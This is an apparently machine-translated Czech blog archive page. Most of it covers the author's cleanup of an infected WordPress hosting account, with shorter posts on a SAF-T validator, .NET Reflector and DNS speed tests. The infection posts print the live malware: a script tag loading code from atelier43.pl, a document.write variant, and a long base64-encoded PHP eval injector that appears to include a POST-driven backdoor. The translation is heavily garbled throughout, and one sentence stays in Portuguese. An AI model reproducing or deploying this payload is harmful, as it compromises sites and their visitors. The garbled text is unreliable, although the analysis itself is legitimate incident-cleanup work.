Soubor

Arquivo do Autor

Problem Solved

17, Prosinec, 2009 Antonio Campos No comment

Problém hlášeny tady vyřešena.

Neshledal důvod, abych mohl pokračovat na milost a nemilost hackaros, ale alespoň prozatím stránky jsou čisté (tento blog je umístěn na jiného poskytovatele a nebyla ovlivněna).

Čistící proces je jednoduchý, ale čas, Jsem začal stahovat všechny soubory, které měly vliv účet, zaplatit zařízení, "panna" kopie Wordpress a se soubory, které již, každá instalace Wordpress, že jsem. Přesto i nadále infikované soubory. Udělal jsem malou aplikaci v C # a rekurzivne vyhledat všechny soubory pro injekci kódu a odchází do jiného adresáře pomocí kopírování souborů "čisté".

Pokud někdo trpí stejným problémem, se klidně zeptat kód jsem použil pro cyklus přes všechny soubory ve všech adresářích a sub-adresáře a najít postižené soubory. Nejsou zde k dispozici, protože aplikace je trochu drsné, pro použití by si měli přečíst kód a přizpůsobit infekce, které soubory mají.

Kategorie: Useless, Slabá místa

UPOZORNĚNÍ: Návštěva těchto stránek může poškodit váš počítač!

16, Prosinec, 2009 Antonio Campos 2 Komentář:

PrtSc Aviso do Chrome

Přestože Chrome je prohlížeč, který používáte na den, získal ještě jeden bod v mém účtu. Je to prohlížeč, který začne rychleji na mém pc, tam, když musím jít na síť a nemůže dočkat, až se otevřít jiný prohlížeč otevřít mohu použít. Dnes, když si otevřete přijatou zprávu, která je na obrázku:

Webové stránky antoniocampos.net obsahuje prvky tohoto webu atelier43.pl, který se zdá být hostitelem malware - tj., software, který může poškodit váš počítač nebo jinak působit bez vašeho souhlasu. Jen návštěvě stránek, které obsahují malware, může infikovat počítač.

Pro podrobnější informace o problémech s těmito prvky, navštivte Domů Bezpečné prohlížení Diagnostika Google na atelier43.pl.

 

poté, co při pohledu na zdrojový kód, který jsem viděl, že nějak bylo vloženého kódu v původním, Škodlivého kódu byla vložena:

<skript src = http:/ / atelier43.pl/images/gifimg.php ></ script>

Ihned po uzavření tag </ kus>, Zpět na všechny ostatní oblasti sídlí dohromady a všechny oblasti měly stejné příznaky, Po důkladné analýze jsem si všiml, že některé soubory byly infikovány injekce, Dosah jako soubor měl jiný kód.

V souborech javascript (. js):

document.write(‘<skript src = http:/ / atelier43.pl/images/gifimg.php >< / script>');

Html soubory se zobrazují v kódu výše popsaným způsobem a v souborech. Php následující kód:

<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygncHEzazcnKSl7ZnVuY3Rpb24gcHEzazcoJHMpe2lmKH

ByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ I2lzJywkcywkYSkpZm9yZWF

jaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk NSl7JGU9cHJlZ19tYXRj

aCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF

0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFx

iIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2

RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRja

F9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14 XSo/KT4jaXM

nLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aF

xzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc

3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycp

LicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlK

CdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkYwWld4cFpYSTBNeTV3YkM5cGJXRm5aW

E12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCR

zLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHM

sMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24

gcHEzazcyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHEzazcxOyRzPWFycmF5KCk7aWYoZnVuY3R

pb25fZXhpc3RzKCRwcTNrNzEpKWNhbGxfdXNlcl9mdW5jKCRwcTNrNzEsJGEsJGIsJGMsJGQ

pO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B

xM2s3JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1h

cnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bn

QoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9

jbGVhbigpO31vYl9zdGFydCgncHEzazcnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2J

fc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcHEzazdsPSgoJGE9QHNldF9lcnJ

vcl9oYW5kbGVyKCdwcTNrNzInKSkhPSdwcTNrNzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY2

9kZSgkX1BPU1RbJ2UnXSkpOw == ')); ?>

Tento kód je zodpovědný za nakažení soubory, pokud mají base64_decode a analyzovat kód se objeví způsob, jakým byly infikované soubory, ale nevysvětluje, jak se kód "vstoupil" poprvé.

Kromě těchto infekcí craidos více souborů, s několika jmény, které čekají na poštovní směrovací číslo php a běží na serveru, ponechává všechny soubory, které uživatel používá zranitelné místo.

Po několika vyhledávání Google všechny body na chybu v Wordpress, ale nenašli, že verze, Myslím, že bys měl být v 2.8.6 hosting pro tento účet mám 3 wordpress instalações všechny aktualizován 2.8.6. Podle moudrosti Google nebyl první, kdo se nakazit touto mor, i když články jsem našel na google, nejsou stejné, infekcí a výskyt škodlivého kódu, je podobný tomu, co se mi stalo.

Takže radím všem, kteří mají stránky v Wordpress, aby zjistil, zda jsou nakaženi.

Já jsem stahovat všechny soubory, které jste hostitelem na tomto serveru pro bližší pohled na to, co se stalo, Myslím, že nepřišel k žádné závěry, jak jsem se nakazil, protože nemám přístup k protokoly apache, Ale aspoň budu muset čistit všechny soubory.

Jedním z řešení je smazat všechny soubory v zařízení a vložit nové verze všech souborů, ale to způsobí, že všechny přidávat vlastní témata a pluginy jsou ztraceny, a vynutit instalaci všech pluginů znovu.

Smůlu DESOLVE na řešení (alespoň čištění souborů) vytvořit nový příspěvek se stejným.

Saft-CS Validator k dispozici v portálu Finance

10, Prosinec, 2009 Antonio Campos No comment

Teď už vím, prostřednictvím komentáře v starší post na SAFT, že financování nyní k dispozici na svých webových stránkách nástroj pro ověření souboru SAFT.

Adresa žádosti o potvrzení je Validator soubory SAF-T_PT, je aplikace v Javě, takže stačí mít nainstalovaný a řekl, aby přístup ke stránce, aby se použít nástroj.

Tato aplikace zkontroluje, zda soubor SAF-T_PT, ve formátu XML, respektuje strukturu pravidel stanovených ve vyhlášce č. DGCI. 1192/2009, de 08 Říjen, kterou se mění vyhláška č.. 321-A/2007, de 26 Březen.
Tento program, pokud se používá on-line archiv potvrzuje SAF-T_PT, ve formátu XML, naznačují, že, aniž by museli nést dat na server.

Kromě této oficiální, jsou mnohem více na internetu "validátory" jsou k dispozici, ale myslím, že je to správné místo pro validaci.

Mimochodem jsem se varovat, dávat pozor, kam podat soubory SAFT, Nevím, kdo je na druhé straně a můžete dělat s fakturační údaje!!

díky Mauricius tip.

Kategorie: Utility

Dekompilovat kód. Čisté (. NET Reflector)

10, Prosinec, 2009 Antonio Campos 5 Komentář:

screenshot_full_screen

Jednou z věcí, která mě vždycky bál. NET je snadnost, s níž se dá dostat k původnímu kódu nebo spustitelného libra-založený rámec.

Existuje řada nástrojů, které umožňují snadný způsob, jak, snadno a rychle zjistit kód aplikace. netto.

Vyzdvihnout jeden z těchto nástrojů, které věřím, je nejoblíbenější, je . NET Reflector z Redgate, přístup kódu aplikace stačí kliknout na tlačítko Procházet a vyberte shromáždění, které chceme vidět kód a právo na rozebrat. Samozřejmě nesmí nabádat nikoho, kdo by jít o kontrolu kódu aplikací třetích stran. Eu uso frequentemente esta ferramenta para estudar o código das librarias da própia framework e ver como é que os senhores da Microsoft implementam certas funcionalidades e obter algumas luzes das melhores práticas a vários niveis na programação em “cima” da framework.

Kategorie: NET., Microsoft

Srovnání rychlosti DNS servery – Část 2

9, Prosinec, 2009 Antonio Campos No comment

Čtenář blog testovány na rychlost vyřešení těchto domén jsem v předchozím článku, se stejným DNS servery, ale začíná na různých ISP, a přidány do seznamu DNS server vašeho ISP, který je Claranet PT.

Výsledky jsou uvedeny v následující tabulce::

_antoniocampos.netmicrosoft.comdigg.comfccn.pt
Nechráněný (208.67.222.222)576363793
Google DNS (8.8.8.8)554851135
Sapo (194.65.5.2)TimedOutTimedOutTimedOutVypršel časový limit
Telepac (194.65.14.27)16112111
Pt-prime(62.48.131.10)20131217
Ne. TV Cabo (212.113.161.226)16151411
Claranet PT (195.22.0.136)10221014

Výsledky i když se liší od dolu, show opět potvrzuje, že ISP servery šrot jsou jména, která vyřešit rychleji, jak je vysvětleno v předchozí článek.

Přestože autor tabulky netvrdila stejné úvěrové, ocenit práci a především sdílení stejné. díky ZEX.

Kategorie: Analýza